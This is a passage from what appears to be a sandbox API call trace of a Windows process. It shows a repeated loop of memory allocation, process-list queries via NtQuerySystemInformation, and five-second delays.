BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.600] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.642] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.674] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.689] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.721] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.736] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.752] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.766] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.784] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.798] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.814] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.829] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.846] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.861] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.893] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 